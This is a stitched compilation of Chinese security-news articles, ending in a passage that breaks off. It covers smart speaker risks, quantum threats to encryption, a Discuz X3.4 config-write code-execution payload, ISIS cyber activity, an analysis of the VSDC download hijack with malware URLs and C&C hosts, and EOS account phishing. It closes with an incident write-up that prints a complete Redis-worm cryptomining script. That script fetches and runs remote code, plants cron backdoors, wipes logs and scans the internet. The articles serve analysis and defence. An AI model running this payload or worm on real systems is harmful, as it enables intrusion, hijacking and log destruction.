你需要了解的智能音箱中的6种安全隐患

如果你家里有一台设备,它总是在监听着正在发生的事情,随时准备记录、处理和存储它接收到的任何信息,你会有什么感觉?你可以将它理解为是一种危言耸听的说法,但从本质上讲,它的确是智能音箱具备的功能所能办到的。

你需要了解的智能音箱中的6种安全隐患

智能音箱除了提供音频播放功能之外,也提供了互联网连接功能,通常还提供了数字助理,这极大地扩展了它们的功能。

有了今天的智能音箱,你可以搜索互联网、控制其他家庭自动化设备、在线购物、发送短信、安排闹钟等等。

这种连接性和功能性可能为我们提供了一些方便,但就像智能音箱等任何新的物联网技术一样,安全问题也随之而来。任何时候,只要向网络添加一个节点,就会暴露出更多潜在的漏洞。由于智能家居就目前而言仍然是相对较新的技术,因此它也必然存在漏洞。

尽管智能家居企业一直在尽可能快地修复这些漏洞,并希望确保它们的设备是安全的,但仍然有可能遇到安全问题。以下是你应该注意的6种潜在安全风险:

1. 意料之外的激活

虽然智能音箱始终保持监听状态,因为它们的麦克风一直处于开启状态,但它们不会记录或处理听到的所有内容,除非它们首先检测到其激活短语。对于Google Home,这个短语是“OK,Google”;对于Amazon speaker,请说“Alexa”。

这里有几个问题。首先,这项技术并不不完美,而且很有可能这个设备会把另一个短语错当成激活短语。例如,美国俄勒冈洲的一对夫妇最近就发现,他们的亚马逊Echo智能音箱一直在他们不知情的情况下录制音频。亚马逊将这一错误归咎于在背景对话中“Alexa”的误解,也就是说这对夫妇在日常对话中可能涉及了“Alexa”这个单词。

2. 错误判断语音指令

不幸的是,此类误解可能还超出了激活的范围。这对俄勒冈州夫妇还指出,智能音箱还将录制的音频发送给了他们联系人名单上的随机人员,因为收到录音的人联系了他们。

亚马逊为这部分事件给出了相同的解释。据该公司称,智能音箱错误的将背景谈话视为一系列命令,导致将谈话录音发送给了这对夫妇的联系人。这种情况表明,智能音箱对语音指令的判断技巧可能还达不到正常工作所需要的高度。

3. 不必要的广告互动

除了智能音箱可能会因误解线索并意外唤醒之外,其他人也可以在未经你许可的情况下有目的地主动唤醒它们。一旦他们这样做了,他们就有可能获得一些有关于你的信息。

汉堡王(Burger King)在运行一个广告时体现了这种漏洞,该广告在播放过程中激活了Google Home智能音箱,并促使它们朗读了皇堡(Whopper)的描述。谷歌反应迅速,阻止了设备响应。不过,汉堡王对此进行了反击,他们修改了这则广告,使它再次激活了Google Home智能音箱。

虽然这个恶作剧可能是相对无害的,但足以证明其他人也可能会在未经你许可的情况下激活你的设备。比如,对着你家的大门或敞开的窗户大喊大叫。由于此漏洞,你应该避免使用智能音箱来解锁门窗。当然,最好的主意还是修改你的激活短语。

4. 黑客和恶意软件

到目前为止,大多数关于智能音箱安全问题的报告都围绕着未经授权的访问或功能缺陷展开。这些设备当然也容易受到恶意的黑客攻击。

技术领域的安全专家已经发现了各种敏感漏洞,使制造商能够修复它们。然而,黑客可能会在某个时候先于安全专家发现其中一些漏洞。如果他们这样做了,他们可能就能够访问你的敏感个人信息。

为了避免自己成为黑客事件的受害者,请仅限于使用你信任的公司发布的硬件和软件。另外,请使用安全密码,并经常修改它。

5. 语音黑客

使用智能音箱还可能增加你被语音黑客攻击的可能性,这是身份盗用的一个分支。在这种攻击中,某个人可能会设法获取到你的语音录音,然后用它来访问你的信息。一旦他们有了这个录音,他们就可以用它来欺骗认证系统,认为他们就是你。这是一种绕过智能音箱语音识别功能的潜在方法。

智能音箱提供了一个潜在的音频录音金矿,可以用来进行语音黑客攻击。如果一个不怀好意的人设法侵入了你的音箱,或者存储记录的云服务,他们可以用它来破解你的各种账户。

6. 第三方存储你的数据

一些云服务正在存储这些记录,这一事实可能会让用户感到不舒服。这些录音可能用于个性化你的体验,提高智能助手的有效性,为你提供广告或做一系列其他事情。

幸运的是,如果你可以通过你的帐户设置删除这些数据。此外,倡导人士也在呼吁提高这些公司如何使用客户数据的透明度。

聪明地使用智能音箱

所有的智能技术都会伴随着安全风险。这并不一定意味着我们就不应该使用它们,但这确实意味着我们应该在使用时更加谨慎,并采取适当的安全措施。

如果你是智能音箱的追随者,那么请花时间配置你的安全设置,并仅限于你信任的人进入它们。

量子计算网络风暴即将来临

随着技术的不断发展,越来越多的问题得到解决。无线电解决了即时通讯问题;电灯让我们能在日落后继续干活;电脑,互联网带来了许多新机遇。但是科技进步的同时也淘汰了很多旧事物,技术的革命性越强,其破旧功力也越大!

在目前新兴的技术中,要数量子计算的革新性最强,这种革新能力将有如加密技术一样带来一阵强大的技术风暴。

量子计算网络风暴即将来临

量子计算的演变

科幻小说中,量子计算更像是魔法而非科学。因为小说里展现的不是电路,而是主人公操作量子比特的画面。

和如今电脑中电路处理的二进制数据不同,量子比特是叠加存在的,它存在于1到0之间的无限空间。因此,理论上它们似乎可以针对一个问题立即给出所有解决方案,而电脑还必须一次尝试一种可能。

现在唯一阻碍量子计算机发展的就是物理工程学方面的挑战,而政府和私企正在努力克服这一问题。

量子计算威胁加密保护地位

随着量子计算的发展,加密技术以及利用加密技术保护的数字信息都面临着威胁。攻击者利用电脑破解加密文件归根结底只是时间问题。大多数现代加密系统,如 Diffie-Hellman 和 RSA,都是基于一个前提——让黑客计算很长的时间才能找到密钥。

由于量子计算并不按这个套路出牌,它不需要一次一次地进行组合,使用量子比特就可以一次就试遍所有的密码组合,几秒的时间就找出正确密钥。

目前唯一限制量子比特解密速度的是当前量子计算机的数量还有限,这一点已在稳步改善中。

美国国家标准与技术研究院(NIST)科学家意识到了这种威胁,该机构的一份报告明确表示量子计算将为加密技术带来威胁。报告称,如果建立大规模的量子计算机组,就可能破解目前大量公共密钥加密系统。唯一的办法是——现在就给信息安全系统做好抵抗量子计算解密的准备。

攻击者不会等你,潜在的攻击者正在窃取加密数据,他们期望不久的将来用量子计算机给数据解密。现在如果没有合适的数据保护措施,一旦他们有了量子计算工具,就会迅速出现数据泄露的威胁。

当前量子世界的数据保护进展

量子计算机解密的问题仍在不断演变。鲜少有人能完全理解这一问题的影响力,还有一些人则对这种危机浑然不觉,但一些创新者正努力依照 NIST 的推荐,为即将到来的量子风暴做准备。

大部分使用量子计算或量子机制的方案都试图创造一种量子计算机无法解开的锁。因此,“后量子加密术”与典型的“AES 加密术”截然不同。用一个例子来说明:

位于卢森堡的卫星运营商 SES 正致力于创建量子加密电讯系统 Quantum Cryptography Telecommunication System (Quartz),这个系统将成为未来异地分散网络的密钥分配平台。这个基于卫星的 QKD(量子密钥分发)系统利用太空光子来保护密钥。

IBM 研究人员也正在研发一种基于数学格框架(mathematical lattices)的新型加密机制,在这种机制中,数据隐藏于复杂的代数结构中。这一想法旨在阻止量子计算机用其强大的运算功能解密,其原理是在原始问题的后部分出更多复杂的加密层,这样整个数学格框架无法在同一时间被全部看透。

与此同时,一家名为 Quantum Xchange 的公司研发了一种利用 QKD 技术的方法。在这种方法中,密钥基于不可破解的量子现象而生成,目的是创建首个安全保护文件的全国性网络,再将其数据发至任意距离之外。和其他处于研发中的方案不同,Quantum Xchange 网络现在就可用,而且此方案弥补了目前加密术中的一些不足之处。

量子计算的风暴来势汹汹,但目前安全界在保护数据方面并非一无是处。现在投资部署正确的防御,未雨绸缪的人就能在量子风暴中稳稳保护好自己的数据。

Discuz最新版代码执行漏洞

0×00概述

近期审计discuz最新版的时候发现配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。

0×01 白盒审计

源码信息:Discuz_X3.4_GIT_SC_UTF8

问题文件: //upload/install/index.php

漏洞类型:配置文件写入导致代码执行

站点地址:http://www.discuz.net/forum-10-1.html

直接看配置信息写入的代码段为 //upload/install/index.php

Discuz最新版代码执行漏洞

看到save_config_file()函数是保存写入配置信息的,配置信息为$_config这个数组,我们跟踪下这个数组;

还是这个文件,代码段为第266行;

Discuz最新版代码执行漏洞

这里的$forceinstall参数即为通过POST接收的配置信息数值为二维数组,看到里面的dbinfo了,这里程序本身未对传入的POST值进行任何过滤,也就存在代码执行问题了。

0×02 漏洞利用

直接安装到写入配置信息的步骤;

Discuz最新版代码执行漏洞

填入正确的数据库用户名账号和密码之后抓包;

Discuz最新版代码执行漏洞

这时候看下具体配置文件,代码段为/upload/uc_server/data/config.inc.php;

Discuz最新版代码执行漏洞

我们以前缀dbinfo[table_pre]参数为利用,看到使用单引号和括号括起来,所以payload为;

payload = pre_’);phpinfo();//

发到上述抓包里点击安装即可写入配置文件;

这时候看这个配置文件;

Discuz最新版代码执行漏洞

直接访问这个文件即可执行;

http://127.0.0.1/Discuz_X3.4_GIT_SC_UTF8/dir_SC_UTF8/upload/uc_server/data/config.inc.php

Discuz最新版代码执行漏洞

0×03 防御

这个漏洞原理比较简单,针对其防御方法是需要对传入的配置信息进行转义处理,这里只要转义单引号就可以了,但是刚开始我有疑惑的点就是这里的payload在实际情况下,我们需要通过类似“爆破”的思路去测试大量payload,但是由于“安装锁”的存在,安装一次就会锁定程序生成install.lock文件防止重装,也就是“爆破”不了,那么这个漏洞是不是就利用不了呢?为了解决这个疑问,我重新看了下安装时候的源码信息,发现这个漏洞还是可以利用的;

Discuz最新版代码执行漏洞

还是在安装的文件里,第478行,可以看到在写入配置信息到config文件之后,下面还会判断当methon为ext_info的时候进行其他操作即生成安装锁文件进行锁定,到这个步骤才是完整的安装操作,也就是和之前的写入配置信息是“分开”进行的,也可通过抓包去看,比较明显,是两个不同的数据包,互相不会干涉,写入配置信息的数据包不会锁定安装程序,所以导致可通过“爆破”去利用,程序这么去设计也是业务逻辑的需求吧,如果写入配置信息的步骤即可生成安装锁文件并且结束安装的话,这个漏洞就利用不了了,除非存在任意文件删除漏洞可以去删除install.lock这个文件。

* 本文作者:davichi8282,转:FreeBuf.COM

ISIS欲发起“孤狼”行动,攻击西方基础设施

E安全7月10日讯 迄今为止,大多数网络恐怖攻击包括篡改目标网站的内容,发布不良信息。然而,据以色列《耶路撒冷邮报》获取的以色列国际反恐研究所(ICT)一份报告指出,伊斯兰网络恐怖分子正在加大力度对西方国家的基础设施发动网络攻击。

ISIS欲发起“孤狼”行动,攻击西方基础设施

重心转移到对基础设施的攻击

研究人员对恐怖组织“伊斯兰国”(ISIS)所支持的黑客的账户进行监控,并在这份报告中讨论了恐怖分子网络行动的几种可能性,例如可能会在网上获取进攻能力以及出于该目的雇佣黑客或从支持恐怖主义的国家处获得援助。

以色列国际反恐研究所(ICT)这份报告指出,网络恐怖主义进攻的另一个趋势是:“‘联合网络哈里发’(UCC)黑客组织的重组。虽然网络恐怖分子2017年初的攻击重点围绕社交网络账户进行,但年底就将重心转移至针对教育机构和关键基础设施的网络攻击。”

报告指出,伊斯兰网络恐怖分子正反击政府和社交媒体巨头对其的限制。Facebook、Twitter 等社交媒体平台最初在清理恐怖主义内容方面有待提升,但过去两年里,Facebook 聘用了大量检查人员负责检查并清理这些内容。圣战分子创建了名为 “Al-Ansar Bank” 的在线支持实体,旨在向账号被删除的用户提供新的身份。

“社交”被封锁,ISIS欲招募更多外国人员

报告指出,加密即时通讯应用程序 Telegram 一度被 ISIS 当作其媒体生命线,圣战分子还创建了独立的平台并开辟了各种通信渠道。“基地组织“建立了专门的粘贴站点,其中包含圣战内容的链接,其用户可通过密码或邀请链接访问该站点。

自2017年10月在拉卡(Raqqah)失利之后,ISIS 的宣传能力被削弱。报告指出,就网络宣传方面而言,ISIS 使用信息图表在互联网上发布并宣传了“军事成就”,以此宽慰自身在其他方面的损失(例如“领地丧失”、头领丧命,收入大幅下降以及新成员数量减少)。

ISIS 专门开发了应用程序教授儿童学习阿拉伯语,其重点可能是教育“下一代”圣战分子。ISIS 2017年“将西方的流行文化元素纳入宣传内容,称其是综合战略的一部分,以此影响潜在的成员。ISIS 利用媒体和互联网的做法在影响穆斯林青年(在西方出生并接受教育)方面发挥了重要的作用。”

ISIS 已尝试整合媒体集团来恢复媒体系统,以简化开发和宣传过程,并且还扩宽了对互联网平台的多样性利用方式,将重点放在加密平台上,旨在通过网络宣传鼓动在西方发起“孤狼”攻击,鼓励在菲律宾和阿富汗招募更多外国人员。

ISIS欲发起“孤狼”行动,攻击西方基础设施

报告指出,这种趋势是国家和企业采取限制措施遏制社交平台用于恐怖主义目的所形成的,网络恐怖分子的逆反应。

此外,为了更好地防御西方情报机构的网络入侵,恐怖组织现已开始散布各种指南、说明和更新,以抵御西方情报机构的恶意软件和在线追踪能力。

众筹网站也有“妙用”

以色列国际反恐研究所(ICT)过去也曾发布报告指出,网络恐怖分子侧重于使用比特币,而这份报告揭露了他们在加大使用众筹网站。

网络恐怖分子的众筹活动 “更多涉及到女性为囚犯子女筹集资金或拯救清真寺免遭破坏”,而“数字货币与军事融资有关,即筹集资金购买武器和军火。”

另外,这份报告还总结了新的法律、国际执法机构合作和跨国公司在打击网络恐怖主义宣传方面的合作。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱[email protected]
@E安全,最专业的前沿网络安全媒体和产业服务平台,每日提供优质全球网络安全资讯与深度思考,欢迎关注微信公众号「E安全」(EAQapp),或登E安全门户网站www.easyaq.com , 查看更多精彩内容。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

360互联网安全中心发现国外知名音视频编辑器VSDC官网(http://www.videosoftdev.com)的软件下载链接遭到劫持,通过被劫持的链接下载软件的用户计算机中将被植入窃密木马、键盘记录器和远控木马。

遭到劫持的站点访问量较大

VSDC音视频编辑器在国外小有名气,其官网http://www.videosoftdev.com在Alexa全球排名前两万之中。此次遭到劫持的下载链接正是VSDC最为知名的软件Free Video Editor的下载链接(http://downloads.videosoftdev.com/video_tools/video_editor_x64.exe和http://downloads.videosoftdev.com/video_tools/video_editor_x32.exe),从Alexa给出的搜索热度看,Free Video Editor是搜索热度最高的VSDC产品。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图1 Free Video Editor是搜索热度最高的VSDC产品

正常的下载链接遭替换

这次下载链接劫持事件在三个时段发生。6月19日凌晨1点30分开始发生第一次下载链接劫持;7月2日18点黑客更换了劫持指向的域名后开始第二次劫持,这次劫持规模较小,可能是黑客为后续的行动进行测试;7月6日17点左右开始第三次劫持,劫持指向的域名与第二次劫持相同,此次劫持规模较大。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图2 VSDC下载链接劫持时间线

一般情况下,用户从VSDC下载Free Video Editor是通过页面http://www.videosoftdev.com/free-video-editor/download进入的。用户点击页面中的“Download Video Editor”按钮之后,站点将根据用户选择的版本跳转至http://downloads.videosoftdev.com/video_tools/video_editor_x64.exe或http://downloads.videosoftdev.com/video_tools/video_editor_x32.exe执行下载。然而在此次劫持事件中,当用户点击“Download Video Editor”按钮后页面跳转至hxxp://5.79.100.218/_files/file.php(6月29日发生的劫持)或hxxp://drbillbailey.us/tw/file.php(7月2日之后发生的劫持),并从这两个站点上下载假的Free Video Editor。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图3 下载链劫持发生时与正常情况下对比图

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图4 劫持指向的站点

向用户计算机中植入窃密木马、键盘记录器和远控木马

下载链接被劫持时,用户下载的假的Free Video Editor并非exe格式的可执行文件,而是一个Javascript脚本,为了躲避杀毒软件的查杀,脚本进行了多层混淆。解开混淆后的脚本内容如图5所示。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图5 解开混淆后的Jabvascript脚本内容

这段脚本借助Powershell从hxxp://185.25.51.133/_files/file1.exe,hxxp://185.25.51.133/_files/file2.exe和hxxp://185.25.51.133/_files/file3.exe下载三个文件到计算机中执行,这些文件同样经过多层混淆,在下文中将用file1,file2和file3表示这三个文件。

file1是个窃密木马,窃取用户计算机中保存的密码、虚拟货币钱包等敏感信息,包括Electrum钱包、Skype本地存储、Telegram账号密码、Steam账号密码和屏幕截图。这些信息将被发送到hxxp://system-check.xyz/index.php。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图6 file1窃取敏感信息代码截图

file2是一个键盘记录器,会记录用户所有的键盘输入并发送到hxxp://wqaz.site/log/index.php。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图7 file2发送键盘输入代码截图

file3是一个Hidden VNC远控木马。Hidden VNC是在受害用户计算机中创建一个新的Windows桌面以隐藏黑客对计算机鼠标、键盘操作的技术,这项技术被各大流行银行木马所使用。File3也是使用Hidden VNC技术的远控木马,C&C为hxxps://185.25.51.152:443。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图8 file3启动Hidden VNC连接代码截图

攻击不受地域限制,站点疑似已被黑客控制

此次攻击波及三十多个国家和地区,基本可以排除由于地区网络劫持导致下载链接被替换的可能,因此此次攻击更有可能是一起供应链污染攻击。

黑客上演“换头术”:行业知名软件VSDC遭遇劫持攻击

图9 攻击影响范围,颜色越深的国家或地区受害计算机越多

而在攻击中还出现了更换劫持指向的域名的情况,这更证明了黑客已经控制了VSDC官网并能够随时将下载链接替换为其他地址。从当前的攻击来看,黑客还只是在特定时间对下载链接进行劫持,并未进行持续大规模劫持,不排除黑客在未来发起更大规模攻击的可能。

IOC

url

hxxp://5.79.100.218/_files

hxxp://drbillbailey.us/tw

hxxp://185.25.51.133/_files/file1.exe

hxxp://185.25.51.133/_files/file2.exe

hxxp://185.25.51.133/_files/file3.exe

C&C

hxxp://system-check.xyz/index.php

hxxp://wqaz.site/log/index.php

hxxps://185.25.51.152:443

MD5

10634c295fe55fede571d3a179553131

79113c6fbafa1f0ca67f41189c0b7474

1b804f4e8d6647314532acee66890260

460cd7630f585a01a759826101fb974b

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

最近因为EOS内存价格暴涨以及交易所陆续开放EOS充提,许多用户开始注册EOS账户参与进来。但EOS的账户机制不同于比特币和以太坊,许多不熟悉的持币用户因此遭遇钓鱼或诈骗,造成巨额损失。这篇文章就为大家科普一下EOS账户机制和提升账户安全的知识。

什么是公钥、私钥、助记词?

我们首先介绍下使用加密币钱包经常会遇到的几个东西:地址、公钥、私钥、助记词、Keystore。

他们的关系:

公钥=地址=银行卡号

私钥=助记词=Keystore+密码=银行卡号+银行卡密码

Keystore是以太坊账户体系专有的,EOS账户体系中没有。

EOS账号有两把私钥

用过比特币或以太坊钱包的都知道,每个账户会有一个地址/公钥,以及与其对应的私钥。地址/公钥作为标识,用来接收转账或者在区块链浏览器查询账户交易记录等信息;私钥可以进行恢复账户、重置密码等操作。

但是,在EOS账户体系中,必须要打破这样的思维。因为每个EOS账号都有两个不同权限的私钥。

EOS账户构成:账户名+Active权限+Owner权限

账户名

由12个字符组成的唯一名称,可以自定义。少于12位的账户必须通过系统拍卖获得。

账户名可使用字符:12345abcdefghijklmnopqrstuvwxyz

EOS账户名相当于以太坊的地址,可以用来接收转账或者在区块链浏览器查询账户交易记录等信息。

Active权限

包括一对Active公钥和私钥。Active即操作权,该权限可以用于转账、投票等日常操作。

Owner权限

包括一对Owner公钥和私钥。Owner即所有权,是账户最高权限,可以用于重置Active私钥。

可以在EOS区块链浏览器中通过用户名查询账户的Owner权限和Active权限的公钥。下图是通过 https://eospark.com/MainNet/account 查询的某账户Owner公钥和Active公钥,每个公钥都有对应的私钥。

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

单私钥模式和双私钥模式

单私钥模式即Owner权限和 Active权限使用同一把私钥。之前映射所提供的私钥就是单私钥模式。目前市面上大部分支持EOS的钱包都采用的是单私钥模式。这样虽然相对简单,只需要备份一把私钥,但是并不安全。

单私钥模式注册的账户:

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

建议有条件的用户尽量采用双私钥模式注册账户。也就是有两个私钥两套助记词。

谨防钓鱼和诈骗

由于注册EOS账户需要已经存在的账户帮忙抵押内存,所以最近常见的钓鱼手法是热心帮忙注册账户。

虽然对方会让用户自己生成公钥和私钥,并且只需要用户提供公钥。但是由于EOS账号有两把私钥,钓鱼者把用户提供的公钥设置为Active权限公钥,把自己的公钥偷偷设置为Owner权限公钥,然后等用户向这个账号里转入EOS资产后,钓鱼者就用自己控制的Owner权限来控制用户的账户,转移EOS资产。

下面就是一位最近被钓鱼的案例:通过他人和第三方工具注册账号导致账户被盗。目前该用户正在寻求社区帮助,还未确定账号被盗的确切原因。

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

防止这种钓鱼的方法:

1.通过可信的渠道注册账号。如可信的EOS钱包或者信任的人,千万不要通过来路不明的个人或者第三方工具注册钱包。

2.如果是他人帮忙注册的账号,在账号注册之后仔细检查Owner权限和Active权限的公钥(可通过 https://eospark.com/MainNet/account 输入账户名查询),如果不是自己提供的公钥,立即停止使用该账户,在确信账户安全前千万不要转入任何EOS资产。

3.妥善保管Owner权限和Active权限的私钥,不要在不信任的地方导入私钥,不要对私钥进行复制粘贴、聊天发送等敏感操作。

虽然EOS和比特币、以太坊的账户体系不一样,但是EOS账户一旦被盗,资产追回的难度同样极大,所以注册和使用账户一定要小心谨慎。

关于更多EOS资讯请点点关注!

记一次朋友服务器被黑的分析处理全过程

刚刚一关系不错的朋友在群里求助

记一次朋友服务器被黑的分析处理全过程

记一次朋友服务器被黑的分析处理全过程

向他要了服务器密码后登上去看了眼,发现被挖矿了。。

记一次朋友服务器被黑的分析处理全过程

结束掉这个进程后发现没有死灰复燃,继续查。

接着在root目录下发现了大量的隐藏文件。。

记一次朋友服务器被黑的分析处理全过程

查了下最近登陆和执行过的命令,没发现异常,由于服务器有redis,猜测是redis爆破进来的,跟他核实了下,他竟然没给redis加密码。。。

记一次朋友服务器被黑的分析处理全过程

XFTP连上后显示隐藏文件,发现了几个可疑的脚本,下载回本地后分析

先从文件名最怪的脚本看起

记一次朋友服务器被黑的分析处理全过程

脚本内容如下:

sleep 1find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete[ -f .mxff0 ] && exit 0echo 0 > .mxff0trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXITsetenforce 0 2>/dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullcrontab -r 2>/dev/nullrm -rf /var/spool/cron 2>/dev/nullgrep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.confrm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullrm -rf /etc/root.sh 2>/dev/nullsync && echo 3 > /proc/sys/vm/drop_cachescat < /etc/security/limits.conf* hard nofile 100000* soft nofile 100000root hard nofile 100000root soft nofile 100000* hard nproc 100000* soft nproc 100000root hard nproc 100000root soft nproc 100000EOFiptables -I INPUT 1 -p tcp --dport 6379 -j DROPiptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPTps xf | grep -v grep | grep "redis-server/|nicehash/|linuxs/|linuxl/|crawler.weibo/|243/44444/|cryptonight/|stratum/|gpg-daemon/|jobs.flu.cc/|nmap/|cranberry/|start.sh/|watch.sh/|krun.sh/|killTop.sh/|cpuminer/|/60009/|ssh_deny.sh/|clean.sh/|/./over/|mrx1/|redisscan/|ebscan/|redis-cli/|barad_agent/|/.sr0/|clay/|udevs/|/.sshd/|/tmp/init" | while read pid _; do kill -9 "$pid"; donerm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullecho 0 > /var/spool/mail/rootecho 0 > /var/log/wtmpecho 0 > /var/log/secureecho 0 > /root/.bash_historyYUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"if cat /etc/*release | grep -i CentOS; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Red; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Fedora; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Ubuntu; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update -q --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Debian; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Mint; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Knoppix; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelseexit 1fisleep 1if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); thencurl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12sleep 1[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112fitname=$( mktemp )OMURL=https://transfer.sh/ly9S0/tmp.5ErvacTPRmcurl -s $OMURL > $tname || wget -q -O $tname $OMURLNMURL=$( curl -s --upload-file $tname https://transfer.sh )mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg[ -z "$NMURL" ] && NMURL=$OMURLncmd=$(basename $(mktemp))sed s|"$OMURL"|"$NMURL"|g < .cmd > $ncmdNSURL=$( curl -s --upload-file $ncmd https://transfer.sh )echo flushall > .datecho config set dir /var/spool/cron >> .datecho config set dbfilename root >> .datecho set Backup1 "/t/n*/2 * * * * curl -s ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho set Backup2 "/t/n*/5 * * * * wget -O .cmd ${NSURL} && bash .cmd/n/t" >> .datecho set Backup3 "/t/n*/10 * * * * lynx -source ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho save >> .datecho config set dir /var/spool/cron/crontabs >> .datecho save >> .datecho exit >> .datpnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanfor x in $( seq 1 224 | sort -R ); dofor y in $( seq 0 255 | sort -R ); do$pnx -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a $x.$y.0.0/16 6379 > .r.$x.$y.oawk /Linux/ {print $1, $3} .r.$x.$y.o > .r.$x.$y.lwhile read -r h p; docat .dat | redis-cli -h $h -p $p --raw &done < .r.$x.$y.ldonedoneecho 0 > /var/spool/mail/root 2>/dev/nullecho 0 > /var/log/wtmp 2>/dev/nullecho 0 > /var/log/secure 2>/dev/nullecho 0 > /root/.bash_history 2>/dev/nullexit 0

这个脚本干了这么几件事:

  1. 检测是否存在别的挖矿程序,有就结束并删除

  2. 设置dns服务器

  3. 修改防火墙规则(由于服务器是centos7,该操作并没有执行成功)

  4. 结束redis等进程

  5. 删除日志(坑爹呢?)

  6. 下载安装iptables等软件

  7. 下载pnscan(一款可以感染IOT设备的蠕虫)

  8. 下载https://transfer.sh/GQCHp/tmp.pZR8v8kihR 并重命名为.gpg然后运行,运行后再删除自身

  9. 设置定时任务

  10. 用pnscan扫描全网6379端口设备

随后执行了 netstat -antp 查看了网络连接

记一次朋友服务器被黑的分析处理全过程

尝试结束掉pnscan发现会重启进程,推测有进程守护

记一次朋友服务器被黑的分析处理全过程

用命令ps -ef|grep pnscan查看pnscan路径

记一次朋友服务器被黑的分析处理全过程

进入到/usr/local/bin目录后执行ls

记一次朋友服务器被黑的分析处理全过程

发现了这个东西静静的躺在那

让我们用rm -rf pnscan送他最后一程

记一次朋友服务器被黑的分析处理全过程

最后一步清理战场

由于/root目录下有大量的.r.x命名比较规则的文件,直接调用正则删除即可

附几个root目录下的脚本:

.cmd[与tmp.Nm1jfFNPap内容一样]:

sleep 1find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete[ -f .mxff0 ] && exit 0echo 0 > .mxff0trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXITsetenforce 0 2>/dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullcrontab -r 2>/dev/nullrm -rf /var/spool/cron 2>/dev/nullgrep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.confrm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullrm -rf /etc/root.sh 2>/dev/nullsync && echo 3 > /proc/sys/vm/drop_cachescat < /etc/security/limits.conf* hard nofile 100000* soft nofile 100000root hard nofile 100000root soft nofile 100000* hard nproc 100000* soft nproc 100000root hard nproc 100000root soft nproc 100000EOFiptables -I INPUT 1 -p tcp --dport 6379 -j DROPiptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPTps xf | grep -v grep | grep "redis-server/|nicehash/|linuxs/|linuxl/|crawler.weibo/|243/44444/|cryptonight/|stratum/|gpg-daemon/|jobs.flu.cc/|nmap/|cranberry/|start.sh/|watch.sh/|krun.sh/|killTop.sh/|cpuminer/|/60009/|ssh_deny.sh/|clean.sh/|/./over/|mrx1/|redisscan/|ebscan/|redis-cli/|barad_agent/|/.sr0/|clay/|udevs/|/.sshd/|/tmp/init" | while read pid _; do kill -9 "$pid"; donerm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullecho 0 > /var/spool/mail/rootecho 0 > /var/log/wtmpecho 0 > /var/log/secureecho 0 > 